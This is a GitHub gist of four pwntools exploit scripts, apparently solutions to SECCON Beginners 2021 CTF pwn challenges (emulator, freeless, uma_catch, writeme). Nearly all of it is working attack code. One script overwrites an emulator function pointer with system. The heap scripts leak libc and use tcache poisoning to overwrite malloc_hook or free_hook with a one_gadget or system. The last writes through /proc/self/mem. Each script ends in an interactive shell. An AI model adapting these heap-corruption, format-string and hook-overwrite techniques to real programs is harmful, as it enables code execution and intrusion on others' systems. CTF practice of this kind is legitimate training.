Skip to content

Instantly share code, notes, and snippets.

@moratorium08

moratorium08/2021_simulator.py

Created May 23, 2021 05:03
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save moratorium08/9f9d000b918fe70d7cefc6503fd8392e to your computer and use it in GitHub Desktop.
Save moratorium08/9f9d000b918fe70d7cefc6503fd8392e to your computer and use it in GitHub Desktop.
Download ZIP
Raw
2021_simulator.py
from __future__ import division, print_function
import random
from pwn import *
import argparse
import time
context.log_level = 'error'
parser = argparse.ArgumentParser()
parser.add_argument(
"--host",
default="127.0.0.1",
help="target host"
)
parser.add_argument(
"--port",
default=3001,
help="target port"
)
parser.add_argument(
'--log',
action='store_true'
)
parser.add_argument(
'--is-gaibu',
action='store_true'
)
args = parser.parse_args()
log = args.log
is_gaibu = args.is_gaibu
if is_gaibu:
host = "emulator.quals.beginners.seccon.jp"
port = 4100
else:
host = args.host
port = args.port
def wait_for_attach():
if not is_gaibu:
print('attach?')
raw_input()
def just_u64(x):
return u64(x.ljust(8, '\x00'))
r = remote(host, port)
def recvuntil(x, verbose=True):
s = r.recvuntil(x)
if log and verbose:
print(s)
return s.strip(x)
def recv(n, verbose=True):
s = r.recv(n)
if log and verbose:
print(s)
return s
def recvline(verbose=True):
s = r.recvline()
if log and verbose:
print(s)
return s.strip('\n')
def sendline(s, verbose=True):
if log and verbose:
pass
#print(s)
r.sendline(s)
def send(s, verbose=True):
if log and verbose:
print(s, end='')
r.send(s)
def interactive():
r.interactive()
####################################
def menu(choice):
recvuntil(':')
sendline(str(choice))
# receive and send
def rs(s, new_line=True, r=':'):
recvuntil(r)
s = str(s)
if new_line:
sendline(s)
else:
send(s)
A = 0
B = 1
C = 2
D = 3
E = 4
H = 5
L = 6
PC_H = 7
PC_L = 8
MEM = -1
def get_high(x):
return (x >> 8) & 0xff
def get_low(x):
return x & 0xff
payload = []
def movi(reg, imm):
l = [0x3e, 0x6, 0x0e, 0x16, 0x1e, 0x26, 0x2e]
if reg >= 0 and reg < len(l):
payload.append(l[reg])
payload.append(imm)
elif reg == -1:
payload.append(0x36)
payload.append(imm)
else:
raise Exception('fail')
addr_system = 0x4010d0
target_fun = 0x4000 + 0x40 * 8
def update(addr, val):
h = get_high(addr)
l = get_low(addr)
movi(H, h)
movi(L, l)
movi(MEM, val)
# update mov_r_r(emu, B, B) to system
for i, x in enumerate(p64(addr_system)):
update(target_fun + i + 4, ord(x))
# update ABC to "sh\x00"
movi(A, ord("s"))
movi(B, ord("h"))
movi(C, 0)
payload.append(0x40)
payload.append(0x41)
payload.append(0x42)
payload.append(0x43)
payload.append(0x42)
payload.append(0xc9)
result = ''
for x in payload:
result += chr(x)
recvuntil('loading to memory...')
wait_for_attach()
sendline(result)
interactive()
#print(result)
Raw
freeless.py
from __future__ import division, print_function
import random
from pwn import *
import argparse
import time
context.log_level = 'error'
parser = argparse.ArgumentParser()
parser.add_argument(
"--host",
default="127.0.0.1",
help="target host"
)
parser.add_argument(
"--port",
default=3001,
help="target port"
)
parser.add_argument(
'--log',
action='store_true'
)
parser.add_argument(
'--is-gaibu',
action='store_true'
)
args = parser.parse_args()
log = args.log
is_gaibu = args.is_gaibu
if is_gaibu:
host = "freeless.quals.beginners.seccon.jp"
port = 9077
else:
host = args.host
port = args.port
def wait_for_attach():
if not is_gaibu:
print('attach?')
raw_input()
def just_u64(x):
return u64(x.ljust(8, '\x00'))
r = remote(host, port)
def recvuntil(x, verbose=True):
s = r.recvuntil(x)
if log and verbose:
print(s)
return s.strip(x)
def recv(n, verbose=True):
s = r.recv(n)
if log and verbose:
print(s)
return s
def recvline(verbose=True):
s = r.recvline()
if log and verbose:
print(s)
return s.strip('\n')
def sendline(s, verbose=True):
if log and verbose:
pass
#print(s)
r.sendline(s)
def send(s, verbose=True):
if log and verbose:
print(s, end='')
r.send(s)
def interactive():
r.interactive()
####################################
def menu(choice):
recvuntil('>')
sendline(str(choice))
# receive and send
def rs(s, new_line=True, r=':'):
recvuntil(r)
s = str(s)
if new_line:
sendline(s)
else:
send(s)
cur_idx = 0
def create(size):
global cur_idx
idx = cur_idx
cur_idx += 1
menu(1)
rs(idx)
rs(size)
return idx
def edit(idx, data):
menu(2)
rs(idx)
rs(data)
def show(idx):
menu(3)
rs(idx)
recvuntil('data: ')
return recvuntil('1. new')
if is_gaibu:
main_arena_offset = 0x1ebbe0
free_hook_offset = 0x1eeb28
malloc_hook_offset = 0x1ebb70
system_offset = 0x55410
one_gadget_offset = 0xe6c81
else:
main_arena_offset = 0x1ebbe0
free_hook_offset = 0x1eeb28
malloc_hook_offset = 0x1ebb70
system_offset = 0x55410
one_gadget_offset = 0xe6c81
x = create(0x500)
x = create(10)
edit(x, 'A' * 0x18 + p64(0x841))
y = create(4095) # -> unsorted bin
edit(x, 'A' * 0x20)
result = show(x).strip('\n')
libc_base = just_u64(result.replace('A' * 0x20, '')) - 0x1ebbe0
edit(x, 'A' * 0x18 + p64(0x821))
print('libc_base:', hex(libc_base))
system = libc_base + system_offset
free_hook = libc_base + free_hook_offset
malloc_hook = libc_base + malloc_hook_offset
one_gadget = libc_base + one_gadget_offset
_ = create(0x810)
x = create(0x1000 - 0xa0)
x = create(10)
edit(x, 'A' * 0x18 + p64(0x61))
y = create(0x1000 - 0x90)
x = create(10)
edit(x, 'A' * 0x18 + p64(0x61))
_ = create(0x100)
## tcache
edit(x, 'A' * 0x20 + p64(malloc_hook))
edit(x, 'A' * 0x18 + p64(0x41))
_ = create(0x30)
z = create(0x30)
edit(z, p64(one_gadget))
#x = create(10)
#edit(x, 'A' * 0x18 + p64(0xef1 - 0x20) + '/bin/sh\x00')
wait_for_attach()
_ = create(0)
interactive()
Raw
uma_catch.py
from __future__ import division, print_function
import random
from pwn import *
import argparse
import time
context.log_level = 'error'
parser = argparse.ArgumentParser()
parser.add_argument(
"--host",
default="127.0.0.1",
help="target host"
)
parser.add_argument(
"--port",
default=3001,
help="target port"
)
parser.add_argument(
'--log',
action='store_true'
)
parser.add_argument(
'--is-gaibu',
action='store_true'
)
args = parser.parse_args()
log = args.log
is_gaibu = args.is_gaibu
if is_gaibu:
host = "uma-catch.quals.beginners.seccon.jp"
port = 4101
else:
host = args.host
port = args.port
def wait_for_attach():
if not is_gaibu:
print('attach?')
raw_input()
def just_u64(x):
return u64(x.ljust(8, '\x00'))
r = remote(host, port)
def recvuntil(x, verbose=True):
s = r.recvuntil(x)
if log and verbose:
print(s)
return s.strip(x)
def recv(n, verbose=True):
s = r.recv(n)
if log and verbose:
print(s)
return s
def recvline(verbose=True):
s = r.recvline()
if log and verbose:
print(s)
return s.strip('\n')
def sendline(s, verbose=True):
if log and verbose:
pass
#print(s)
r.sendline(s)
def send(s, verbose=True):
if log and verbose:
print(s, end='')
r.send(s)
def interactive():
r.interactive()
####################################
def menu(choice):
recvuntil('>')
sendline(str(choice))
# receive and send
def rs(s, new_line=True, r='>'):
recvuntil(r)
s = str(s)
if new_line:
sendline(s)
else:
send(s)
def catch(idx, color='bay'):
rs(1)
rs(idx)
rs(color)
def name(idx, name):
rs(2)
rs(idx)
rs(name)
def show(idx):
rs(3)
rs(idx)
return recvline()
def dance(idx):
rs(4)
rs(idx)
def release(idx):
rs(5)
rs(idx)
if is_gaibu:
libc_offset = 0x21bf7
free_hook_offset = 0x3ed8e8
system_offset = 0x4f550
else:
libc_offset = 0x21bf7
free_hook_offset = 0x3ed8e8
system_offset = 0x4f550
#libc_offset = 0x270b3 - 0x551c
#free_hook_offset = 0x3ed8e8
#system_offset = 0x4f440
x = 0
catch(x)
name(x, "%11$p")
libc_base = int(show(x).strip(' '), 16) - libc_offset
print(hex(libc_base))
free_hook = libc_base + free_hook_offset
system = libc_base + system_offset
wait_for_attach()
y = 1
w = 2
z = 3
catch(y)
release(x)
release(y)
name(y, p64(free_hook))
catch(w)
catch(z)
name(z, p64(system))
name(w, "/bin/sh\x00")
release(w)
interactive()
Raw
writeme.py
from __future__ import division, print_function
import random
from pwn import *
import argparse
import time
context.log_level = 'error'
parser = argparse.ArgumentParser()
parser.add_argument(
"--host",
default="127.0.0.1",
help="target host"
)
parser.add_argument(
"--port",
default=3001,
help="target port"
)
parser.add_argument(
'--log',
action='store_true'
)
parser.add_argument(
'--is-gaibu',
action='store_true'
)
args = parser.parse_args()
log = args.log
is_gaibu = args.is_gaibu
if is_gaibu:
host = "writeme.quals.beginners.seccon.jp"
port = 27182
else:
host = args.host
port = args.port
def wait_for_attach():
if not is_gaibu:
print('attach?')
raw_input()
def just_u64(x):
return u64(x.ljust(8, '\x00'))
r = remote(host, port)
def recvuntil(x, verbose=True):
s = r.recvuntil(x)
if log and verbose:
print(s)
return s.strip(x)
def recv(n, verbose=True):
s = r.recv(n)
if log and verbose:
print(s)
return s
def recvline(verbose=True):
s = r.recvline()
if log and verbose:
print(s)
return s.strip('\n')
def sendline(s, verbose=True):
if log and verbose:
pass
#print(s)
r.sendline(s)
def send(s, verbose=True):
if log and verbose:
print(s, end='')
r.send(s)
def interactive():
r.interactive()
####################################
def menu(choice):
recvuntil(':')
sendline(str(choice))
# receive and send
def rs(s, new_line=True, r=':'):
recvuntil(r)
s = str(s)
if new_line:
sendline(s)
else:
send(s)
recvuntil('Chance: ')
sendline('id(1)')
addr_42 = int(recvline()) + 0x538
recvuntil('File: ')
sendline('/proc/self/mem')
recvuntil('Seek: ')
sendline(str(addr_42))
interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment